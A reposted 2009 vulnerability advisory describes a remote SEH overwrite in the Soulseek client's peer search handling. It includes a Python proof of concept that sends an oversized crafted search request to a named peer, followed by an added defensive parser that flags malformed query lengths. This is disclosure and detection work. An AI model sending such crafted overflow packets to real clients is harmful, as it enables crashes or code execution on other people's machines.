Soulseek 157 NS < 13e & 156.* Remote Direct Peer Search Code Execution

2009-07-05 / 2009-07-06
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
=============================================
- Release date: July 02, 2009
- Discovered by: Laurent Gaffié ; http://g-laurent.blogspot.com/
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application. One of the things that makes Soulseek(tm) unique is our community and community-related features. Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private. Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!"

III. DESCRIPTION
-------------------------
The Soulseek client supports direct peer file search, which lets a user search for the files he wants directly on a peer's computer. Unfortunately, the handling of an incoming direct search request is vulnerable to a remote SEH overwrite: an oversized search query sent by a peer overwrites the structured exception handler on the stack.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept targets a user called 123yow123. The original script was written for Python 2; the escape sequences lost in extraction have been restored and the byte strings are written for Python 3.

import struct
import sys
import socket

ip = "IP_ADDR"
port = "PORT_NUM"   # must be the peer's port as an integer. You can find out how to find the IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
except socket.error:
    print("Can't connect to peer!\n")
    sys.exit(0)

junk = b"\x41" * 3084                            # filler up to the SEH record
next_seh = struct.pack('<L', 0x42424242)         # overwrites the next-SEH pointer
seh = struct.pack('<L', 0x43434343)              # overwrites the SEH handler address
other_junk = b"\x61" * 1424

# PeerInit message (code 1) naming the user "123yow123", type "P", token 0
buffer = b"\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer += b"\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00\x21\x0c\x00\x00\x08"
# FileSearchRequest header (code 8), token, and a declared query length of 0x0c15 bytes
buffer += b"\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00" + junk + next_seh + seh + other_junk
s.send(buffer)

After the query is sent, the SEH handler is overwritten.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client prior to 157 NS 13e.

VI. SYSTEMS AFFECTED
-------------------------
Windows, all versions

VII. SOLUTION
-------------------------
Upgrade to 157 NS 13e (http://slsknet.org/download.html)

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
July 02, 2009

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

XII. PERSONAL NOTES
------------------------
The Soulseek team patched this bug a month ago; a distributed message urging users to upgrade their Soulseek client has been sent for a month now, and not many users still use vulnerable Soulseek versions.
+ To those who like to rip bugs and make an exploit "universal" for fame: just make sure it's at least universal before you say so. For the others: http://www.youtube.com/watch?v=tVACUjHn6yU :)
@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html
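The advisory's proof of concept shows the framing the vulnerable client receives: a length-prefixed PeerInit message followed by a length-prefixed search request whose declared query length (0x0c15 = 3093 bytes) far exceeds anything a user would type. The following added example, which is not part of the advisory or of the Soulseek project, parses that framing from a captured peer-connection byte stream and flags search requests whose declared query length is implausible or does not match the bytes actually present, which is the check a defender would want in a protocol-aware IDS rule or a hardened client. The field interpretation (one-byte code 1 = PeerInit, uint32 code 8 = FileSearchRequest, uint32 token, then a length-prefixed query) is inferred from the PoC bytes and from public Soulseek protocol descriptions; the 512-byte threshold and the sample usernames and queries are constructed for the example.

```python
import struct

# Largest query a real client would plausibly send; anything above this is
# flagged. Constructed threshold for this example, not a value from the advisory.
MAX_QUERY_LEN = 512

# Peer-message codes as laid out in the advisory's PoC bytes; the names follow
# public Soulseek protocol documentation (assumption).
PEER_INIT = 1
FILE_SEARCH_REQUEST = 8


def encode_string(s):
    """Soulseek string: little-endian uint32 length followed by the raw bytes."""
    return struct.pack('<I', len(s)) + s


def build_stream(username, token, query):
    """Constructed sample stream: PeerInit followed by one FileSearchRequest."""
    init = (bytes([PEER_INIT]) + encode_string(username)
            + encode_string(b'P') + struct.pack('<I', 0))
    search = struct.pack('<II', FILE_SEARCH_REQUEST, token) + encode_string(query)
    return (struct.pack('<I', len(init)) + init
            + struct.pack('<I', len(search)) + search)


def parse_messages(data):
    """Split a peer stream into (code, body) pairs.

    The first message carries a one-byte code (PeerInit); later messages carry
    a uint32 code. Framing problems are reported with a string code so the
    caller can treat them as findings instead of silently skipping them.
    """
    msgs, off, first = [], 0, True
    while off + 4 <= len(data):
        (length,) = struct.unpack_from('<I', data, off)
        off += 4
        body = data[off:off + length]
        if len(body) != length:            # declared length runs past the capture
            msgs.append(('TRUNCATED', body))
            break
        off += length
        if first:
            first = False
            if not body:
                msgs.append(('EMPTY', body))
                continue
            msgs.append((body[0], body[1:]))
        else:
            if len(body) < 4:
                msgs.append(('SHORT', body))
                continue
            msgs.append((struct.unpack_from('<I', body)[0], body[4:]))
    return msgs


def check_search_request(body):
    """Validate a FileSearchRequest body: uint32 token, then a query string.

    Returns a list of findings; an empty list means the request looks sane.
    """
    findings = []
    if len(body) < 8:
        return ['search request body shorter than token + length field']
    token, qlen = struct.unpack_from('<II', body, 0)
    actual = len(body) - 8
    if qlen != actual:
        findings.append('declared query length %d does not match %d bytes present'
                        % (qlen, actual))
    if qlen > MAX_QUERY_LEN:
        findings.append('query length %d exceeds %d' % (qlen, MAX_QUERY_LEN))
    return findings


def inspect_stream(data):
    """Return all findings for a captured peer stream (empty list when clean)."""
    findings = []
    for code, body in parse_messages(data):
        if code in ('TRUNCATED', 'EMPTY', 'SHORT'):
            findings.append('malformed framing: %s' % code)
        elif code == FILE_SEARCH_REQUEST:
            findings.extend(check_search_request(body))
    return findings


if __name__ == '__main__':
    # Constructed samples: a normal query and one sized like the advisory's PoC.
    print(inspect_stream(build_stream(b'alice', 7, b'radiohead ok computer')))
    print(inspect_stream(build_stream(b'alice', 7, b'A' * 3093)))
```

A client-side fix follows the same shape: reject or truncate the query before copying it into a fixed-size buffer, rather than trusting the peer-supplied length field. The length-mismatch check also catches captures where the declared message length and the bytes on the wire disagree, which is exactly what the PoC does by declaring 3093 query bytes and sending more.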

References:

http://seclists.org/fulldisclosure/2009/Jul/0016.html



Copyright 2024, cxsecurity.com